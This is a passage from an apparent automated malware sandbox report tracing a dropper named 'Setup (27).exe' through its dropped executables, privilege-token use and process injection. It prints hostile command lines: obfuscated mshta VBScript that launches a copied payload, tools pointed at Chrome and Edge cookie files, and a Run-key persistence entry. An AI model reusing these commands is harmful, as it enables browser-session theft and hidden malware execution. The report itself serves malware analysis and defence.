pid Process 1044 4283430.exe 1176 5543575.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4632 JkEcZxZ3AfcUm5X8zImyJIkb.exe Token: SeRestorePrivilege 4964 WerFault.exe Token: SeBackupPrivilege 4964 WerFault.exe Token: SeBackupPrivilege 4964 WerFault.exe Token: SeDebugPrivilege 4844 8425144.exe Token: SeDebugPrivilege 1004 Puc9Xjoy5UA4rK6___tfSCDs.exe Token: SeDebugPrivilege 4548 l_Mj3p4vunohw0luZGFxxkb1.exe Token: SeDebugPrivilege 1528 ZdKR5xTcpwDA6ufZb92rS0rx.exe Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeDebugPrivilege 4616 Esplorarne.exe.com Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeDebugPrivilege 1736 taskkill.exe Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeDebugPrivilege 1892 svchost.exe Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeDebugPrivilege 2352 Esplorarne.exe.com Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found Token: SeShutdownPrivilege 3100 Process not Found Token: SeCreatePagefilePrivilege 3100 Process not Found -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2624 1iuAXELm7UVJuzYVx6c2wTLA.tmp 1012 Cleaner Installation.exe 4152 WEATHER Manager.tmp 2204 Conhost.exe 4244 Esplorarne.exe.com 5308 Setup.exe 7088 g90uxw8hJrh44TxICMxWT8tQ.tmp 6596 mask_svc.exe 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com 6232 Esplorarne.exe.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5796 F732.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4992 wrote to memory of 1000 4992 Setup (27).exe 90 PID 4992 wrote to memory of 1000 4992 Setup (27).exe 90 PID 4992 wrote to memory of 1000 4992 Setup (27).exe 90 PID 4992 wrote to memory of 3092 4992 Setup (27).exe 89 PID 4992 wrote to memory of 3092 4992 Setup (27).exe 89 PID 4992 wrote to memory of 3092 4992 Setup (27).exe 89 PID 4992 wrote to memory of 4548 4992 Setup (27).exe 106 PID 4992 wrote to memory of 4548 4992 Setup (27).exe 106 PID 4992 wrote to memory of 4548 4992 Setup (27).exe 106 PID 4992 wrote to memory of 500 4992 Setup (27).exe 104 PID 4992 wrote to memory of 500 4992 Setup (27).exe 104 PID 4992 wrote to memory of 500 4992 Setup (27).exe 104 PID 4992 wrote to memory of 4440 4992 Setup (27).exe 100 PID 4992 wrote to memory of 4440 4992 Setup (27).exe 100 PID 4992 wrote to memory of 4440 4992 Setup (27).exe 100 PID 4992 wrote to memory of 2248 4992 Setup (27).exe 101 PID 4992 wrote to memory of 2248 4992 Setup (27).exe 101 PID 4992 wrote to memory of 2248 4992 Setup (27).exe 101 PID 4992 wrote to memory of 572 4992 Setup (27).exe 103 PID 4992 wrote to memory of 572 4992 Setup (27).exe 103 PID 4992 wrote to memory of 572 4992 Setup (27).exe 103 PID 4992 wrote to memory of 4520 4992 Setup (27).exe 94 PID 4992 wrote to memory of 4520 4992 Setup (27).exe 94 PID 4992 wrote to memory of 4520 4992 Setup (27).exe 94 PID 4992 wrote to memory of 4616 4992 Setup (27).exe 95 PID 4992 wrote to memory of 4616 4992 Setup (27).exe 95 PID 4992 wrote to memory of 4616 4992 Setup (27).exe 95 PID 4992 wrote to memory of 656 4992 Setup (27).exe 102 PID 4992 wrote to memory of 656 4992 Setup (27).exe 102 PID 4992 wrote to memory of 656 4992 Setup (27).exe 102 PID 4992 wrote to memory of 5048 4992 Setup (27).exe 98 PID 4992 wrote to memory of 5048 4992 Setup (27).exe 98 PID 4992 wrote to memory of 5048 4992 Setup (27).exe 98 PID 4992 wrote to memory of 4628 4992 Setup (27).exe 96 PID 4992 wrote to memory of 4628 4992 Setup (27).exe 96 PID 4992 wrote to memory of 4628 4992 Setup (27).exe 96 PID 4992 wrote to memory of 4632 4992 Setup (27).exe 99 PID 4992 wrote to memory of 4632 4992 Setup (27).exe 99 PID 4992 wrote to memory of 4524 4992 Setup (27).exe 97 PID 4992 wrote to memory of 4524 4992 Setup (27).exe 97 PID 4992 wrote to memory of 4524 4992 Setup (27).exe 97 PID 4992 wrote to memory of 4648 4992 Setup (27).exe 93 PID 4992 wrote to memory of 4648 4992 Setup (27).exe 93 PID 4992 wrote to memory of 4648 4992 Setup (27).exe 93 PID 4992 wrote to memory of 1528 4992 Setup (27).exe 92 PID 4992 wrote to memory of 1528 4992 Setup (27).exe 92 PID 4992 wrote to memory of 1528 4992 Setup (27).exe 92 PID 4992 wrote to memory of 1004 4992 Setup (27).exe 91 PID 4992 wrote to memory of 1004 4992 Setup (27).exe 91 PID 4992 wrote to memory of 1004 4992 Setup (27).exe 91 PID 4992 wrote to memory of 1440 4992 Setup (27).exe 121 PID 4992 wrote to memory of 1440 4992 Setup (27).exe 121 PID 4992 wrote to memory of 1440 4992 Setup (27).exe 121 PID 4992 wrote to memory of 4956 4992 Setup (27).exe 113 PID 4992 wrote to memory of 4956 4992 Setup (27).exe 113 PID 4992 wrote to memory of 4956 4992 Setup (27).exe 113 PID 1440 wrote to memory of 2624 1440 1iuAXELm7UVJuzYVx6c2wTLA.exe 112 PID 1440 wrote to memory of 2624 1440 1iuAXELm7UVJuzYVx6c2wTLA.exe 112 PID 1440 wrote to memory of 2624 1440 1iuAXELm7UVJuzYVx6c2wTLA.exe 112 PID 2248 wrote to memory of 4320 2248 5nEhi9IZIbRPfduIH1EvVdge.exe 110 PID 2248 wrote to memory of 4320 2248 5nEhi9IZIbRPfduIH1EvVdge.exe 110 PID 2248 wrote to memory of 4320 2248 5nEhi9IZIbRPfduIH1EvVdge.exe 110 PID 4628 wrote to memory of 2816 4628 SfUxNE69mEAUGsuKWAdazU5O.exe 111 PID 4628 wrote to memory of 2816 4628 SfUxNE69mEAUGsuKWAdazU5O.exe 111
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (27).exe"C:\Users\Admin\AppData\Local\Temp\Setup (27).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Users\Admin\Documents\laPknA7ubFvj_i_QGTMvnn0_.exe"C:\Users\Admin\Documents\laPknA7ubFvj_i_QGTMvnn0_.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3092 -
C:\Users\Admin\Documents\laPknA7ubFvj_i_QGTMvnn0_.exeC:\Users\Admin\Documents\laPknA7ubFvj_i_QGTMvnn0_.exe3⤵
- Executes dropped EXE
PID:1892
-
-
-
C:\Users\Admin\Documents\ql6lbKp5925srBDbTvYJfwkm.exe"C:\Users\Admin\Documents\ql6lbKp5925srBDbTvYJfwkm.exe"2⤵
- Executes dropped EXE
PID:1000 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1000 -s 3123⤵
- Program crash
PID:4016
-
-
-
C:\Users\Admin\Documents\Puc9Xjoy5UA4rK6___tfSCDs.exe"C:\Users\Admin\Documents\Puc9Xjoy5UA4rK6___tfSCDs.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Users\Admin\Documents\ZdKR5xTcpwDA6ufZb92rS0rx.exe"C:\Users\Admin\Documents\ZdKR5xTcpwDA6ufZb92rS0rx.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Users\Admin\Documents\BMG_GmhfPGrt3H8Z7HF1KdFS.exe"C:\Users\Admin\Documents\BMG_GmhfPGrt3H8Z7HF1KdFS.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4648 -
C:\Users\Admin\Documents\BMG_GmhfPGrt3H8Z7HF1KdFS.exe"C:\Users\Admin\Documents\BMG_GmhfPGrt3H8Z7HF1KdFS.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4832
-
-
-
C:\Users\Admin\Documents\2WK9SLI36KTbDdiSu4mreNHU.exe"C:\Users\Admin\Documents\2WK9SLI36KTbDdiSu4mreNHU.exe"2⤵
- Executes dropped EXE
PID:4520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 2803⤵
- Program crash
PID:560
-
-
-
C:\Users\Admin\Documents\r2ej3xhygamYZJR_Dv47zUDo.exe"C:\Users\Admin\Documents\r2ej3xhygamYZJR_Dv47zUDo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4616
-
-
C:\Users\Admin\Documents\SfUxNE69mEAUGsuKWAdazU5O.exe"C:\Users\Admin\Documents\SfUxNE69mEAUGsuKWAdazU5O.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:1080
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5844
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2148
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5292
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 14804⤵
- Program crash
PID:5644
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:3324 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4088
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6064
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1304
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1508
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5608
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1504
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5224
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6760
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3076
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1196
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6256
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6712
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6768
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1292
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1200
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6604
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4656
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7088
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6840
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6272
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3908
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3544
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4384
-
-
-
-
C:\Users\Admin\Documents\6A5q91esR20wkamsBkutPsbh.exe"C:\Users\Admin\Documents\6A5q91esR20wkamsBkutPsbh.exe"2⤵
- Executes dropped EXE
PID:4524 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 2363⤵
- Program crash
PID:3068
-
-
-
C:\Users\Admin\Documents\GYsj3mYnL8gBDKbUbPZpIRQ6.exe"C:\Users\Admin\Documents\GYsj3mYnL8gBDKbUbPZpIRQ6.exe"2⤵
- Executes dropped EXE
PID:5048 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4920
-
-
-
C:\Users\Admin\Documents\JkEcZxZ3AfcUm5X8zImyJIkb.exe"C:\Users\Admin\Documents\JkEcZxZ3AfcUm5X8zImyJIkb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4632 -
C:\Users\Admin\AppData\Roaming\8425144.exe"C:\Users\Admin\AppData\Roaming\8425144.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4844 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4844 -s 23484⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5240
-
-
-
C:\Users\Admin\AppData\Roaming\2771837.exe"C:\Users\Admin\AppData\Roaming\2771837.exe"3⤵PID:1984
-
-
C:\Users\Admin\AppData\Roaming\3330326.exe"C:\Users\Admin\AppData\Roaming\3330326.exe"3⤵PID:2352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 24844⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4672
-
-
-
C:\Users\Admin\AppData\Roaming\6645266.exe"C:\Users\Admin\AppData\Roaming\6645266.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2568 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:5316
-
-
-
-
C:\Users\Admin\Documents\H4erv5l6WEJxWHfLFxpHs7mv.exe"C:\Users\Admin\Documents\H4erv5l6WEJxWHfLFxpHs7mv.exe"2⤵
- Executes dropped EXE
PID:4440
-
-
C:\Users\Admin\Documents\5nEhi9IZIbRPfduIH1EvVdge.exe"C:\Users\Admin\Documents\5nEhi9IZIbRPfduIH1EvVdge.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\5nEhi9IZIbRPfduIH1EvVdge.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\5nEhi9IZIbRPfduIH1EvVdge.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵PID:4320
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\5nEhi9IZIbRPfduIH1EvVdge.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\5nEhi9IZIbRPfduIH1EvVdge.exe" ) do taskkill -f -iM "%~NxA"4⤵PID:1064
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "5nEhi9IZIbRPfduIH1EvVdge.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
-
-
-
C:\Users\Admin\Documents\43TYr58WmdFAwC2tR_mPogh4.exe"C:\Users\Admin\Documents\43TYr58WmdFAwC2tR_mPogh4.exe"2⤵
- Executes dropped EXE
PID:656
-
-
C:\Users\Admin\Documents\GkTd_7ikMU7OMXkuur8aPZ7N.exe"C:\Users\Admin\Documents\GkTd_7ikMU7OMXkuur8aPZ7N.exe"2⤵
- Executes dropped EXE
PID:572 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 1843⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964
-
-
-
C:\Users\Admin\Documents\09aBxkCrXDDmj3XiCyxEtA23.exe"C:\Users\Admin\Documents\09aBxkCrXDDmj3XiCyxEtA23.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:500 -
C:\Users\Admin\Documents\09aBxkCrXDDmj3XiCyxEtA23.exeC:\Users\Admin\Documents\09aBxkCrXDDmj3XiCyxEtA23.exe3⤵
- Executes dropped EXE
PID:3024
-
-
-
C:\Users\Admin\Documents\l_Mj3p4vunohw0luZGFxxkb1.exe"C:\Users\Admin\Documents\l_Mj3p4vunohw0luZGFxxkb1.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Users\Admin\Documents\oMxahy17LUHadopI73SnlOg8.exe"C:\Users\Admin\Documents\oMxahy17LUHadopI73SnlOg8.exe"2⤵
- Executes dropped EXE
PID:4956 -
C:\Users\Admin\Documents\oMxahy17LUHadopI73SnlOg8.exe"C:\Users\Admin\Documents\oMxahy17LUHadopI73SnlOg8.exe" -q3⤵
- Executes dropped EXE
PID:2980
-
-
-
C:\Users\Admin\Documents\1iuAXELm7UVJuzYVx6c2wTLA.exe"C:\Users\Admin\Documents\1iuAXELm7UVJuzYVx6c2wTLA.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1440
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.21⤵
- Modifies data under HKEY_USERS
PID:2092
-
C:\Users\Admin\AppData\Local\Temp\is-I2OJG.tmp\1iuAXELm7UVJuzYVx6c2wTLA.tmp"C:\Users\Admin\AppData\Local\Temp\is-I2OJG.tmp\1iuAXELm7UVJuzYVx6c2wTLA.tmp" /SL5="$801F2,138429,56832,C:\Users\Admin\Documents\1iuAXELm7UVJuzYVx6c2wTLA.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\is-KQ64O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KQ64O.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:984 -
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent3⤵
- Executes dropped EXE
PID:652 -
C:\Users\Admin\AppData\Local\Temp\is-9D1LC.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-9D1LC.tmp\WEATHER Manager.tmp" /SL5="$6016E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4152 -
C:\Users\Admin\AppData\Local\Temp\is-NFKP6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NFKP6.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7155⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5308 -
